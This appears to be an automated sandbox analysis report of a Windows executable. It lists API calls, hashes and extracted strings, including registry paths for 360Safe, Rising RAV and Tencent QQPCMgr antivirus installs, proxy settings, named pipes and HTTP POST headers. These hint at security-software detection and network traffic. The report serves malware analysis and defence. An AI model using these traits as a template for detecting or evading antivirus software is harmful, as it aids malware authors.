• Instruction ID: 5d0ffb722ef327f411fc1abfd5a1774ccf5443c6ba7cc9efedbed90ebec969e4
• Opcode Fuzzy Hash: 2421d9b0af766796b78481f562871010e4be39d0225d3ac369f90baab30e3769
• Instruction Fuzzy Hash: BF015275A00218AEDB10DFA6D985BAEB7B5EF44748F10443FA511F3291C7B88E40CA54
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 004127F4
  • Part of subcall function 0041131B: RegCloseKey.ADVAPI32(00000001,00000000,004124EF,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360,00000001,00000010,00000000,?,?,004123A0,?), ref: 00411325
  • Part of subcall function 0041131B: RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00411337
• RegCloseKey.ADVAPI32(00000000,SOFTWARE\rising\RAV,00000000,004FC0BC,00000000,?,?,0041275A,004FDA04), ref: 0041285B
  • Part of subcall function 0041134A: RegQueryValueExW.ADVAPI32(00000000,004123A0,00000000,004123A0,00000000,?,00000000,?,004123A0,?), ref: 00411373
  • Part of subcall function 0041134A: RegQueryValueExW.ADVAPI32(?,00000001,00000000,00000001,00000000,?,?,?), ref: 004113A8
  • Part of subcall function 00411460: __EH_prolog.LIBCMT ref: 00411465
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseH_prologQueryValue$Open
• String ID: SOFTWARE\rising\RAV$installpath$|P
• API String ID: 2132191456-2056135755
• Opcode ID: e1056f18951c662493af21d6bf02fff146b17d0f5c6e91da0990a79860842ddb
• Instruction ID: 9d7070764ca2f926924e9fc70ea091814b8af889e217cf7e8c7dd790c1051848
• Opcode Fuzzy Hash: e1056f18951c662493af21d6bf02fff146b17d0f5c6e91da0990a79860842ddb
• Instruction Fuzzy Hash: 8A015271E002199EDB00EF9AC985BAEB7B4FF44755F10453FA915F3251C7B84E41CA54
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __lock.LIBCMT ref: 0048E484
  • Part of subcall function 00499E3B: __mtinitlocknum.LIBCMT ref: 00499E4F
  • Part of subcall function 00499E3B: __amsg_exit.LIBCMT ref: 00499E5B
  • Part of subcall function 00499E3B: EnterCriticalSection.KERNEL32(?,?,?,0048F0A4,00000004,004FFD30,0000000C,00499516,00000000,00000000,00000000,00000000,00000000,0049AF7A,00000001,00000214), ref: 00499E63
• ___sbh_find_block.LIBCMT ref: 0048E48F
• ___sbh_free_block.LIBCMT ref: 0048E49E
• HeapFree.KERNEL32(00000000,00000001,004FFCB0,0000000C,00499E1C,00000000,00500298,0000000C,00499E54,00000001,?,?,0048F0A4,00000004,004FFD30,0000000C), ref: 0048E4CE
• GetLastError.KERNEL32(?,0048F0A4,00000004,004FFD30,0000000C,00499516,00000000,00000000,00000000,00000000,00000000,0049AF7A,00000001,00000214), ref: 0048E4DF
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
• String ID:
• API String ID: 2714421763-0
• Opcode ID: e50029bad8b597c017010720c07fe66b71ac0cdc606b605e4307d116484fe6b1
• Instruction ID: c5c5381865119a084fa91d96abcddb2d2a7d9fc74ed70467104da45f6ed01fbb
• Opcode Fuzzy Hash: e50029bad8b597c017010720c07fe66b71ac0cdc606b605e4307d116484fe6b1
• Instruction Fuzzy Hash: 4E014F71900216AADF30BFB79D0AB5E3AA49F00B28F14896FF508A61D1DA3D89409B5D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0040888C
  • Part of subcall function 004092DC: __EH_prolog.LIBCMT ref: 004092E1
  • Part of subcall function 004092DC: std::_Lockit::_Lockit.LIBCPMT ref: 004092EF
  • Part of subcall function 004092DC: int.LIBCPMT ref: 00409303
  • Part of subcall function 004092DC: std::locale::_Getfacet.LIBCPMT ref: 0040930C
  • Part of subcall function 0040A189: std::locale::facet::_Decref.LIBCPMT ref: 0040A18F
• _localeconv.LIBCMT ref: 0040890B
• _strcspn.LIBCMT ref: 00408A11
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: H_prolog$DecrefGetfacetLockitLockit::__localeconv_strcspnstd::_std::locale::_std::locale::facet::_
• String ID: e
• API String ID: 4086212889-4024072794
• Opcode ID: fa827408a8f9456c1e0779950962fdb9fd915d18edb79f35fcf11f3ebf01605a
• Instruction ID: 41e2625f1b5f1b296c41b000f148f95bffbbaca9bb85b5a2337090ae48548098
• Opcode Fuzzy Hash: fa827408a8f9456c1e0779950962fdb9fd915d18edb79f35fcf11f3ebf01605a
• Instruction Fuzzy Hash: 82E1B572900209AFCF01EFA8C941BEE7BB5AF59318F05412AFD44BB282D7759E05CB95
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: __aulldvrm
• String ID: $0123456789ABCDEF$0123456789abcdef
• API String ID: 1302938615-30751140
• Opcode ID: c59d2d1e85fd2753ebce2d1eb2c4a721000ebf75c78a54823684a6baad5373b5
• Instruction ID: 486db474da5697b43c337eda1abfa69955ed90a7475341e6408d60f1d905287f
• Opcode Fuzzy Hash: c59d2d1e85fd2753ebce2d1eb2c4a721000ebf75c78a54823684a6baad5373b5
• Instruction Fuzzy Hash: 95819B71A0C3618FDB14CF29E84062BB7E1AFC8308F85495EF984A7341D779DD098B9A
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID: tcp$udp$v$L
• API String ID: 0-3078230542
• Opcode ID: b9eede8dd2e12199cb9e69643aa023e524a164128a0fb813f7e1c088b3f3f73d
• Instruction ID: f705ec312fd09e8bd1c360c508e853198a431bb0d9674bfd75717808391e7353
• Opcode Fuzzy Hash: b9eede8dd2e12199cb9e69643aa023e524a164128a0fb813f7e1c088b3f3f73d
• Instruction Fuzzy Hash: 21817DB1C01219DFCF219F99C8406FEBBB4EF54304F26816BE445A7260D77C8A80DBA6
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0040E49D
  • Part of subcall function 0040E8C0: __EH_prolog.LIBCMT ref: 0040E8C5
Strings
• Content-Type: application/x-www-form-urlencoded, xrefs: 0040E4D6
• User-Agent: Mozilla/4.0, xrefs: 0040E4E1
• Accept: */*, xrefs: 0040E4EC
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog
                                                                                                                                                • String ID: Accept: */*$Content-Type: application/x-www-form-urlencoded$User-Agent: Mozilla/4.0
                                                                                                                                                • API String ID: 3519838083-3429858835
                                                                                                                                                • Opcode ID: c0ef92fc76695590a9a7f057c6625585df012ef57415b17949cd0057272eca56
                                                                                                                                                • Instruction ID: 8f526a88d5ee6dbe2e92da0baddb94cb72eb8ca1b557f15a9244e7cf9dadf497
                                                                                                                                                • Opcode Fuzzy Hash: c0ef92fc76695590a9a7f057c6625585df012ef57415b17949cd0057272eca56
                                                                                                                                                • Instruction Fuzzy Hash: 02512A71D40214BBCF21AAB6AC82DAE76A9EB24764F10082BF501772C3DA7E495187DD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0040E69F
                                                                                                                                                  • Part of subcall function 0040DE85: __EH_prolog.LIBCMT ref: 0040DE8A
                                                                                                                                                  • Part of subcall function 0040DE85: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0040DEDF
                                                                                                                                                  • Part of subcall function 0040DE85: RegCloseKey.ADVAPI32(00000050), ref: 0040DF0C
                                                                                                                                                  • Part of subcall function 0040DF2B: __EH_prolog.LIBCMT ref: 0040DF30
                                                                                                                                                  • Part of subcall function 0040DF2B: RegOpenKeyExW.ADVAPI32(80000001,00000050,00000000,00000001,00000000), ref: 0040DF89
                                                                                                                                                  • Part of subcall function 0040DF2B: RegCloseKey.ADVAPI32(00000000,00000000,Proxy Port,00000050,?), ref: 0040DFBD
                                                                                                                                                  • Part of subcall function 0040DFDB: __EH_prolog.LIBCMT ref: 0040DFE0
                                                                                                                                                  • Part of subcall function 0040DFDB: _memset.LIBCMT ref: 0040E009
                                                                                                                                                  • Part of subcall function 0040DFDB: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,0050EB7C), ref: 0040E055
                                                                                                                                                  • Part of subcall function 0040DFDB: RegCloseKey.ADVAPI32(?,?,00000000,?,0050EB7C), ref: 0040E09B
                                                                                                                                                  • Part of subcall function 0048E466: __lock.LIBCMT ref: 0048E484
                                                                                                                                                  • Part of subcall function 0048E466: ___sbh_find_block.LIBCMT ref: 0048E48F
                                                                                                                                                  • Part of subcall function 0048E466: ___sbh_free_block.LIBCMT ref: 0048E49E
                                                                                                                                                  • Part of subcall function 0048E466: HeapFree.KERNEL32(00000000,00000001,004FFCB0,0000000C,00499E1C,00000000,00500298,0000000C,00499E54,00000001,?,?,0048F0A4,00000004,004FFD30,0000000C), ref: 0048E4CE
                                                                                                                                                  • Part of subcall function 0048E466: GetLastError.KERNEL32(?,0048F0A4,00000004,004FFD30,0000000C,00499516,00000000,00000000,00000000,00000000,00000000,0049AF7A,00000001,00000214), ref: 0048E4DF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog$CloseOpen$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock_memset
                                                                                                                                                • String ID: %s:%s$P$|P
                                                                                                                                                • API String ID: 2185476623-3699797963
                                                                                                                                                • Opcode ID: 11795defee477b16ea5b85a83a71f34bb2bfaf1642742826b1556c03305d85e1
                                                                                                                                                • Instruction ID: 696a280e7a290548a43bcd0d251ad5842fbc17f1aa82ab143aa8b27b34a33c1d
                                                                                                                                                • Opcode Fuzzy Hash: 11795defee477b16ea5b85a83a71f34bb2bfaf1642742826b1556c03305d85e1
                                                                                                                                                • Instruction Fuzzy Hash: F451D432D001199BCF20EBA9CD42BAEB7B4AF04354F04457BF915BB2D2DB789A54CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog__wcsicmp
                                                                                                                                                • String ID: content-length$|P
                                                                                                                                                • API String ID: 2034386301-339770886
                                                                                                                                                • Opcode ID: 704468bf937ee58c013036078331a44edade505c06e0b4d626a68e701fccbb7b
                                                                                                                                                • Instruction ID: b175c810bd2a7799e79e3ee9ce4a38584a277d864ee36905999d26bc19e67c51
                                                                                                                                                • Opcode Fuzzy Hash: 704468bf937ee58c013036078331a44edade505c06e0b4d626a68e701fccbb7b
                                                                                                                                                • Instruction Fuzzy Hash: F2519F31D01108DBCB11EFA9C4856EEFBF5AF44318F14412BE415B7291C778AA85CBAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strncmp
                                                                                                                                                • String ID: .\crypto\x509v3\v3_crld.c$fullname$relativename
                                                                                                                                                • API String ID: 909875538-3737910691
                                                                                                                                                • Opcode ID: 391d1f0ae7a71fc80bacea596a77411f5bb44b5b3aacdd67a9383a063f003045
                                                                                                                                                • Instruction ID: 22a119a95265cfaf73d5584bb0e15b1cb5f0b88c6fb835de68260849ae267fe8
                                                                                                                                                • Opcode Fuzzy Hash: 391d1f0ae7a71fc80bacea596a77411f5bb44b5b3aacdd67a9383a063f003045
                                                                                                                                                • Instruction Fuzzy Hash: 88412E76B403146BE2107A66BC42B9773489F84725F28017BFD099B3C3DBADF84146AD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog_memset_strlen
                                                                                                                                                • String ID: |P
                                                                                                                                                • API String ID: 607265390-2149487505
                                                                                                                                                • Opcode ID: d3df06e46884b4210847c3860b960aea74a746266fa20508f5bdff34bfbcd069
                                                                                                                                                • Instruction ID: e353b26752cf1f1adf76238c06ac54bebe0fc6dc8a321b3b4aedfd5100933e9c
                                                                                                                                                • Opcode Fuzzy Hash: d3df06e46884b4210847c3860b960aea74a746266fa20508f5bdff34bfbcd069
                                                                                                                                                • Instruction Fuzzy Hash: D951E63190010DDBDF10DB99C855BEEBBB5AF08314F14446BE825A72D1C63C9EC28B9D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 00412335
                                                                                                                                                  • Part of subcall function 004124B0: __EH_prolog.LIBCMT ref: 004124B5
                                                                                                                                                  • Part of subcall function 004124B0: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360,00000001,00000010,00000000,?,?,004123A0,?), ref: 0041251C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog$Close
                                                                                                                                                • String ID: C:\Program Files (x86)\360\360Safe\$C:\Program Files\360\360Safe\$|P
                                                                                                                                                • API String ID: 1511779150-2204400252
                                                                                                                                                • Opcode ID: 5eebb6980e2a4f8e73b1600658a5e7403e630db34811cda339b60b5aaad71f2f
                                                                                                                                                • Instruction ID: 93809fbbc9a5cd6c55be1bf38c365d03e2cbb58d2b0a349c1b53351b640ae786
                                                                                                                                                • Opcode Fuzzy Hash: 5eebb6980e2a4f8e73b1600658a5e7403e630db34811cda339b60b5aaad71f2f
                                                                                                                                                • Instruction Fuzzy Hash: 8D41BF71D0010D9BCF10DFA9DA85AEEBBF8AF48318F10406BE515F7292C7789A44CB69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset
                                                                                                                                                • String ID: .\crypto\buffer\buffer.c
                                                                                                                                                • API String ID: 2102423945-294840303
                                                                                                                                                • Opcode ID: 95f42d77e17f6a11a6aea8f8d1d984739206d5e6ab0fa1a2f7526fd591e3b69d
                                                                                                                                                • Instruction ID: 4bb162841090a635c03e9a5848cebe2445fbff1592c9dcc4d3eeb140c1d99703
                                                                                                                                                • Opcode Fuzzy Hash: 95f42d77e17f6a11a6aea8f8d1d984739206d5e6ab0fa1a2f7526fd591e3b69d
                                                                                                                                                • Instruction Fuzzy Hash: 42212BB6B403213BD210AA6EFC83F5AE7989B40B60F55852BF50DD73C2E6A89C5142D4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 00416FFD
                                                                                                                                                  • Part of subcall function 0040394C: __EH_prolog.LIBCMT ref: 00403951
                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,\\.\pipe\), ref: 00417083
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00417092
                                                                                                                                                  • Part of subcall function 004119AC: __EH_prolog.LIBCMT ref: 004119B1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog$CloseCreateFileHandle
                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                • API String ID: 1152210893-91387939
                                                                                                                                                • Opcode ID: 03fd998e1fd62a5cd4ef101ae35d695b68503df25cca0b7c6bc718ade9c90a60
                                                                                                                                                • Instruction ID: 9728d139a5d0482f8183b7d25c96f1a8ecd160ffa4db711b1bda0e472da86953
                                                                                                                                                • Opcode Fuzzy Hash: 03fd998e1fd62a5cd4ef101ae35d695b68503df25cca0b7c6bc718ade9c90a60
                                                                                                                                                • Instruction Fuzzy Hash: D921507580414DAEDB10EFA8CC85EEE7B7CEF0036CF10462AF525B71D2C6799A448769
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041AE30
                                                                                                                                                  • Part of subcall function 0040394C: __EH_prolog.LIBCMT ref: 00403951
                                                                                                                                                  • Part of subcall function 0040D74A: _wcschr.LIBCMT ref: 0040D75D
                                                                                                                                                • GetFileAttributesW.KERNEL32(?,0000005C,?,00419C4F,?,?,?,?,?,?,?,00419C4F), ref: 0041AEA0
                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,00419C4F), ref: 0041AEAE
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog$AttributesCreateDirectoryFile_wcschr
                                                                                                                                                • String ID: |P
                                                                                                                                                • API String ID: 849846381-2149487505
                                                                                                                                                • Opcode ID: 1d5a19967571cfc1f3d5b31715a4386a507c6a3dbcc8ed082e64837e0fcdd231
                                                                                                                                                • Instruction ID: 87d0792f5b1616a2ea928d6f2b3b027692368bfc911689c58771688b6c99afaa
                                                                                                                                                • Opcode Fuzzy Hash: 1d5a19967571cfc1f3d5b31715a4386a507c6a3dbcc8ed082e64837e0fcdd231
                                                                                                                                                • Instruction Fuzzy Hash: C621F9369402059BCB10EBA9CC45BEEBBB4FF44319F10053AE511B72C2C7745E098B95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041263C
                                                                                                                                                  • Part of subcall function 00411FE1: __EH_prolog.LIBCMT ref: 00411FE6
                                                                                                                                                  • Part of subcall function 00411FE1: _memset.LIBCMT ref: 0041202F
                                                                                                                                                  • Part of subcall function 00411FE1: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,?,004FC0BC,00000000), ref: 00412052
                                                                                                                                                  • Part of subcall function 00411FE1: PathAddBackslashW.SHLWAPI(?,?,00000000,?,?,004FC0BC,00000000), ref: 0041209E
                                                                                                                                                  • Part of subcall function 00411FE1: RegCloseKey.ADVAPI32(?,00000000), ref: 004120BD
                                                                                                                                                  • Part of subcall function 004119AC: __EH_prolog.LIBCMT ref: 004119B1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog$BackslashCloseOpenPath_memset
                                                                                                                                                • String ID: InstallDir$SOFTWARE\Tencent\QQPCMgr$|P
                                                                                                                                                • API String ID: 2105566652-2680235536
                                                                                                                                                • Opcode ID: 88de171b13fc2eb7140431906bdaf97f633d946f680fb22e09af613943847c3d
                                                                                                                                                • Instruction ID: 85bb74a503b2b68a383a299d9f3be1f27c0a295c10de92006c6556a7cb71ff03
                                                                                                                                                • Opcode Fuzzy Hash: 88de171b13fc2eb7140431906bdaf97f633d946f680fb22e09af613943847c3d
                                                                                                                                                • Instruction Fuzzy Hash: F5218372D0010D9BCB00EFE9C981AEEFBB8EF44319F14416EE515B7282D7785A45CBA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041C863
                                                                                                                                                • _memset.LIBCMT ref: 0041C8A7
                                                                                                                                                  • Part of subcall function 0041462E: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,0041C8BA,00000002,?,?), ref: 0041464C
                                                                                                                                                  • Part of subcall function 0040D892: __vsnprintf.LIBCMT ref: 0040D8C9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
